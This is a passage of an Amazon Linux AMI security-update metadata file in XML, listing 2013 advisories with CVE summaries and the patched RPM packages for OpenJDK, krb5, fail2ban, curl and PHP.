arch="i686"><filename>Packages/php54-process-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.16-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-207</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-207: important priority package update for java-1.6.0-openjdk</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2473:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2472:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2471:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2470:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2469:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2465:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2463:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2461:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-2459:
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
CVE-2013-2457:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2456:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2455:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2453:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2452:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2450:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2448:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2447:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2446:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2445:
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine.
CVE-2013-2444:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2443:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2412:
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information.
CVE-2013-2407:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-1571:
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation.
CVE-2013-1500:
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500" title="" id="CVE-2013-1500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571" title="" id="CVE-2013-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407" title="" id="CVE-2013-2407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412" title="" id="CVE-2013-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443" title="" id="CVE-2013-2443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444" title="" id="CVE-2013-2444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445" title="" id="CVE-2013-2445" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446" title="" id="CVE-2013-2446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447" title="" id="CVE-2013-2447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448" title="" id="CVE-2013-2448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450" title="" id="CVE-2013-2450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452" title="" id="CVE-2013-2452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453" title="" id="CVE-2013-2453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455" title="" id="CVE-2013-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456" title="" id="CVE-2013-2456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457" title="" id="CVE-2013-2457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459" title="" id="CVE-2013-2459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461" title="" id="CVE-2013-2461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463" title="" id="CVE-2013-2463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" title="" id="CVE-2013-2465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469" title="" id="CVE-2013-2469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470" title="" id="CVE-2013-2470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471" title="" id="CVE-2013-2471" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472" title="" id="CVE-2013-2472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473" title="" id="CVE-2013-2473" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1014.html" title="" id="RHSA-2013:1014" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-62.1.11.11.90.55.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="62.1.11.11.90.55.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-62.1.11.11.90.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-208</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-208: medium priority package update for krb5</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2002-2443:
It was found that kadmind's kpasswd service did not perform any validation on incoming network packets, causing it to reply to all requests. A remote attacker could use this flaw to send spoofed packets to a kpasswd service that appear to come from kadmind on a different server, causing the services to keep replying packets to each other, consuming network bandwidth and CPU.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2443" title="" id="CVE-2002-2443" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0942.html" title="" id="RHSA-2013:0942" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server-ldap" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-10.26.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-10.26.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="10.26.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-10.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-209</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-209: medium priority package update for fail2ban</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2178:
973756:
CVE-2013-2178 fail2ban: remote denial of service due to apache log parsing issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2178" title="" id="CVE-2013-2178" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fail2ban" version="0.8.10" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/fail2ban-0.8.10-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-210</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-210: medium priority package update for curl</title><issued date="2013-07-12 15:32:00" /><updated date="2014-09-15 23:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1944:
The tailMatch function in cookie.c in cURL and libcurl before 7.30.0 does not properly match the path domain when sending cookies, which allows remote attackers to steal cookies via a matching suffix in the domain of a URL.
A flaw was found in the way libcurl matched domains associated with cookies. This could lead to cURL or an application linked against libcurl sending the wrong cookie if only part of the domain name matched the domain associated with the cookie, disclosing the cookie to unrelated hosts.
950577:
CVE-2013-1944 curl: Cookie domain suffix match vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1944" title="" id="CVE-2013-1944" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.27.0" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.27.0-11.34.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="curl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.27.0-11.34.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.27.0" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.27.0-11.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-211</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-211: critical priority package update for php</title><issued date="2013-07-12 15:56:00" /><updated date="2014-09-15 23:17:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4113:
A buffer overflow flaw was found in the way PHP parsed deeply nested XML documents. If a PHP application used the xml_parse_into_struct() function to parse untrusted XML content, an attacker able to supply specially-crafted XML could use this flaw to crash the application or, possibly, execute arbitrary code with the privileges of the user running the PHP interpreter.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113" title="" id="CVE-2013-4113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1049.html" title="" id="RHSA-2013:1049" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-fpm" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.27" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.27-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.27-1.0.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.27" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.27-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-212</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-212: critical priority package update for php54</title><issued date="2013-07-12 15:56:00" /><updated date="2014-09-15 